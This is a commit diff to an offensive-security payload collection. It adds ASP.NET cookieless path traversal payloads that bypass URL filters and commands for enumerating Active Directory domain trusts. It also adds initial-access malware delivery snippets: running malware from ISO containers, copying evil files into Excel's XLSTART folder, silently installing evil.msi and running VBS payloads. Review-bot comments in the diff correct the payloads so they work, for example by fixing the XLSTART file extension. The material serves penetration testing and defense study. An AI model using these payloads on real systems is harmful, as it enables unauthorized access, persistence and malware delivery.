Mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git (synced 2024-12-18 10:26:09 +00:00)

Commit 7752ff806f (parent e879ca42a3): ASPNET Cookieless Bypass
@ -13,6 +13,7 @@
* [Double URL encoding](#double-url-encoding)
* [UNC Bypass](#unc-bypass)
* [NGINX/ALB Bypass](#nginxalb-bypass)
* [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
* [Path Traversal](#path-traversal)
* [Interesting Linux files](#interesting-linux-files)
* [Interesting Windows files](#interesting-windows-files)
@ -72,6 +73,7 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
```
### Double URL encoding
```powershell
@ -82,6 +84,7 @@ http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
### UNC Bypass
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
@ -90,6 +93,7 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
\\localhost\c$\windows\win.ini
```
### NGINX/ALB Bypass
NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
@ -99,6 +103,21 @@ To bypass this behaviour just add forward slashes in front of the url:
```http://nginx-server////////../../```
### ASPNET Cookieless Bypass
When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID.
We can use this behavior to bypass filtered URLs.
```powershell
/admin/(S(X))/main.aspx
/admin/Foobar/(S(X))/../(S(X))/main.aspx
/(S(X))/admin/(S(X))/main.aspx
```
### Java Bypass
Bypass Java's URL protocol
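Review bot: The opening of the new ASPNET Cookieless section is a sentence fragment: `When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL ...` should be one sentence, e.g. `When cookieless session state is enabled, ASP.NET embeds the session ID in the URL instead of relying on a cookie`. The line `We can use this behavior to bypass filtered URLs.` also needs the one-sentence reason the three payloads work, otherwise a reader cannot tell why a made-up `(S(X))` is accepted: a front-end filter (WAF, reverse proxy or path-based authorization rule) matches the literal request path containing `(S(X))`, while ASP.NET removes the cookieless session segment before it resolves the handler, so `/admin/(S(X))/main.aspx` is served as `/admin/main.aspx`. Say whether `X` is a placeholder for an arbitrary value, and that the second payload (`/admin/Foobar/(S(X))/../(S(X))/main.aspx`) combines the segment with `/../` so the normalised path still lands on `main.aspx`. Minor: the fence is tagged `powershell` for a list of URL paths; a plain or `http` fence is less misleading.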
@ -210,3 +229,4 @@ The following log files are controllable and can be included with an evil payloa
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
* [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
* [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal)
* [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072)
@ -3422,19 +3422,22 @@ $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$nul
### Enumerate trusts between domains
```powershell
nltest /trusted_domains
```
* Native `nltest`
```powershell
nltest /trusted_domains
```
* PowerShell `GetAllTrustRelationships`
```powershell
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
or
```powershell
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
SourceName TargetName TrustType TrustDirection
---------- ---------- --------- --------------
domainA.local domainB.local TreeRoot Bidirectional
```
SourceName TargetName TrustType TrustDirection
---------- ---------- --------- --------------
domainA.local domainB.local TreeRoot Bidirectional
```
* Crackmapexec module `enum_trusts`
```powershell
cme ldap <ip> -u <user> -p <pass> -M enum_trusts
```
### Exploit trusts between domains
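Review bot: The new `cme ldap <ip> -u <user> -p <pass> -M enum_trusts` block is fenced as `powershell`, but CrackMapExec is a Python tool run from a Linux shell; tag that fence `bash` (or leave it untagged) so the fence language no longer contradicts the `* Native nltest` / `* PowerShell GetAllTrustRelationships` labelling of the other two bullets. The rendered hunk interleaves the old `or`-separated layout with the new bullet layout; make sure the unlabeled first `nltest /trusted_domains` block and the bare `or` line are gone in the new text, otherwise the `nltest` and `GetAllTrustRelationships` blocks appear twice. One addition worth making while touching this section: `([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()` only lists the current domain's trusts; the forest-level counterpart `([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()` is the one that shows forest trusts and fits the `Exploit trusts between domains` section that follows.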
@ -5,7 +5,8 @@
## Summary
* [Complex Chains](#complex-chains)
* [Payloads](#payloads)
* [Container](#container)
* [Payload](#payload)
* [Binary Files](#binary-files)
* [Code Execution Files](#code-execution-files)
* [Embedded Files](#embedded-files)
@ -29,8 +30,31 @@
* **DECOY**: used to continue pretext narration after detonating malware
* Typically open PDF files
Examples:
* HTML SMUGGLING(PASSWORD PROTECTED ZIP + ISO(LNK + IcedID + PNG)) used by [TA551/Storm-0303](https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/)
## Payloads
## Container
* **ISO/IMG** - can contain hidden files, gets **automounted** giving easy access to contained files (`powershell –c .\malware.exe`)
* **ZIP** - can contain hidden files (locate ZIP + unpack it + change dir + run Malware)
* **WIM** - Windows Image, builtin format used to deploy system features
```ps1
# Mount/Unmount .WIM
PS> Mount-WindowsImage -ImagePath myarchive.wim -Path "C:\output\path\to\extract" -Index 1
PS> Dismount-WindowsImage -Path "C:\output\path\to\extract" -Discard
```
* **7-zip, RAR, GZ** - should get a native support on Windows 11
## Trigger
* **LNK**
* **CHM**
* **ClickOnce**
## Payload
### Binary Files
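Review bot: In the ISO/IMG bullet, `powershell –c .\malware.exe` uses an en dash (`–`) instead of a hyphen, so PowerShell will not recognise it as the `-c` (`-Command`) parameter; it should read `powershell -c .\malware.exe`. The new `## Trigger` heading (LNK, CHM, ClickOnce) has no Summary entry, although `Container` and `Payload` were added to the Summary in the first hunk of this file; add `* [Trigger](#trigger)` between them so the table of contents matches the section order. Wording: `should get a native support on Windows 11` reads better as `native support is expected on Windows 11`, and the `Mount-WindowsImage` / `Dismount-WindowsImage` block would be clearer with the `-Index 1` and `-Discard` arguments explained in a comment, since a reader who has not used DISM will not know why they are there.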
@ -106,10 +130,23 @@ These files can be executed directly on the system without any third party.
* Word with Macro (.doc, .docm)
* Excel library (.xll)
* Excel macro-enabled add-in file (.xlam)
```ps1
xcopy /Q/R/S/Y/H/G/I evil.ini %APPDATA%\Microsoft\Excel\XLSTART
```
* WSF files (.wsf)
* MSI installers (.msi)
```ps1
powershell Unblock-File evil.msi; msiexec /q /i .\evil.msi
```
* MSIX/APPX app package (.msix, .appx)
* ClickOnce (.application, .vsto)
* ClickOnce (.application, .vsto, .appref-ms)
* Powershell scripts (.ps1)
* Windows Script Host scripts (.wsh, .vbs)
```ps1
cscript.exe payload.vbs
wscript payload.vbs
wscript /e:VBScript payload.txt
```
### Embedded Files
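Review bot: The snippet under `Excel macro-enabled add-in file (.xlam)` copies `evil.ini` into `%APPDATA%\Microsoft\Excel\XLSTART`, but Excel only auto-opens workbooks and add-ins from XLSTART, so the file name should carry the extension the bullet is about: `xcopy /Q/R/S/Y/H/G/I evil.xlam %APPDATA%\Microsoft\Excel\XLSTART`. The same block is fenced `ps1` while `%APPDATA%` is cmd.exe variable syntax that PowerShell hands to xcopy unexpanded; either tag the fence `cmd` or write `$env:APPDATA`. The `.wsh, .vbs` block is fine as is, but `wscript /e:VBScript payload.txt` deserves a one-line comment that `/e:` forces the script engine so the extension no longer matters, since that is the whole point of that line. Lastly, two `ClickOnce (.application, .vsto ...)` lines appear in the hunk; if the first is the removed original that is fine, otherwise drop the one without `.appref-ms`.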
@ -148,5 +185,6 @@ In 2022, LAPSUS$ claimed responsibility for a cyberattack on NVIDIA, a major gra
* [Top 10 Payloads: Highlighting Notable and Trending Techniques - delivr.to](https://blog.delivr.to/delivr-tos-top-10-payloads-highlighting-notable-and-trending-techniques-fb5e9fdd9356)
* [Executing Code as a Control Panel Item through an Exported Cplapplet Function - @spotheplanet](https://www.ired.team/offensive-security/code-execution/executing-code-in-control-panel-item-through-an-exported-cplapplet-function)
* [02. Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach](https://youtu.be/CwNPP_Xfrts)
* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon Youtube](https://youtu.be/CwNPP_Xfrts)
* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon PDF](https://binary-offensive.com/files/x33fcon%20-%20Desperate%20Infection%20Chains.pdf)
* [Red Macros Factory - https://binary-offensive.com/](https://binary-offensive.com/initial-access-framework)